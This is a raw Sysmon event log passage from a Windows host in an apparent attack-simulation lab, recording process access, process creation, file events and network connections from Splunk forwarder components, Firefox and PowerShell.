18:18:13.764{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.764{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4FE5-613A-7F90-03000000C801}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.763{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FE5-613A-7F90-03000000C801}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.748{B81B27B7-4FE5-613A-7F90-03000000C801}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.747{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2FADA16297837A858DC27D7A7C96E2E3,SHA256=5D47A099CB9DE73D0B3900B2D6C4C0829477FE0B211C09000135DF8DFB2C37EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:37.275{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56799-false10.0.1.12-8000- 10341000x800000000000000035086118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.247{B81B27B7-4FE5-613A-7E90-03000000C801}66923692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FE5-613A-7E90-03000000C801}6692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FE5-613A-7E90-03000000C801}6692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FE5-613A-7E90-03000000C801}6692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.064{B81B27B7-4FE5-613A-7E90-03000000C801}6692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F699A5DB446FCED650AB1C350B3D041C,SHA256=92C8C9D1322A4D2915B7FCAFAB731F93FAE9AF6C5C064A9D92C758466A41E270,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:38.527{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56800-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=522D450339F7AE8BE981B840A1B395F5,SHA256=F5E9626663EFA8B1DD8C1CDAF6C86128E8F7101A41D04DF937740FCF9D5BB53A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18E9EDA02EC4E09427DEA5D102C75026,SHA256=B839DED061C18388BB16210C4C186364110424F77A9C20264CBD7CD97E149C72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FFDAADB12FF3C8FD652396C96928D55,SHA256=28224754CACCF9F46B308A21C127894D65A79CBBDF4C473705CE107025AAF7BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=33EAF2DFEC1E9B3BDD9187B0C9799C62,SHA256=FF94C1C37B788A1B04F94992124D47F0C79ED148B689FB1A39273FDDA2840632,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=78BFD1A943F10BDF3537606393E03F8D,SHA256=F8B0D1528D65C903E020F9BAE7A0813F683A9D84224CFCE520F5835D5D36ABC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=D031AE979C5113E0FD63E8AE49C898F2,SHA256=2A1D60F4B7D7A4C67CA0530EFEA3106390D01956E91CE4FC4A276FE10C4C3EEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=403A3872E666D21D76A36676510B1E42,SHA256=9FCB15B08B65C1AF3F00AEA9C6084C7FD94EB23FA5AF6068CA6F992A9E76CBC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=30FFCDFDE5ABB8EDA9440155A1A19426,SHA256=A81F680CA7C957270514C556A7A177B54280922C851A0B1ABD2829A0DCF8709D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=54A5162A32525FB1534A678731324B40,SHA256=2024CDC4E151AA2647B8751FA11274CE1B3B0616C6120A48A5B66A63A89499A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:17.001{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49E6CB389E845C7E2C97CF5F96A90D3C,SHA256=08F2779526666E7C4A95CFA72AE9823E870E2D2B7618CF45194DFC983C2128C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.142{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56801-false10.0.1.12-8000- 23542300x800000000000000035086142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:18.016{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1283B93128C7F80BDAAF9395FFF358B1,SHA256=551C63A4F495B3C20881DCD0CB5F1E8BA5BDBD94A9A3EE67C76DDCE172F6E29A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:19.747{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9D353BDCEF7F8071E06B86AE97B3AC6,SHA256=46345A3E352AF0E110CCA8402D137B0248449A1F89AA48A1A6EDB107CB879DDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:19.031{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A613FFB9D4D942DF9FE4BDB45056FD0,SHA256=DE721C10639F18694031DEF3627F5BA12D5CC43E753C12009C0A20F4A5A2C655,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.542{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56802-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:20.099{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B2CCBBC084E768FF7E9C8BD802BB290,SHA256=01D277A08DCB23AFDBF0AFB8FC641AB8FEBFDF5066862B661D19F83A59A9F308,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:21.145{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=485B16F7427FBCFC912712820235E529,SHA256=7C2E6F958BFDD529D40BD24B6A0A48DA5339C626A5D44201B35DA7580FC0A06D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:22.163{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5FFD9D33BDB9894CDFCF9CA35A893C0,SHA256=30495330FE9BBDFE5FB470068F8EE683B254979C753EF950AB3321923D6DE8A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:48.185{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56803-false10.0.1.12-8000- 23542300x800000000000000035086150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:23.181{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3282D74480FFA15E86575E6C27C25635,SHA256=0D8EF0A07DCDA38B04FAA61112BA043DD43CEF25B4A2AEB91F6DBA5396860834,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:49.553{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56804-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:24.626{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4C93D0FB5204014EFB78DAE57C5A7779,SHA256=284C370B870BFCE6DD74563CB2A09A197CDC1FF10EF6D201FC2AAA69D16950DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:24.195{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47F7D7177A5974C14785C2B96247119D,SHA256=15C74A47D3D4DF25B2856B486AE363BB9D2BA35586A2645F7386BB5B238EF93A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:25.210{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0A77669E0A94A5190E4656279C42C58,SHA256=0CBB85A180787E9BA4742283481EA9ABCC8770C373E881BA4E2425556E58CBBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:26.226{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 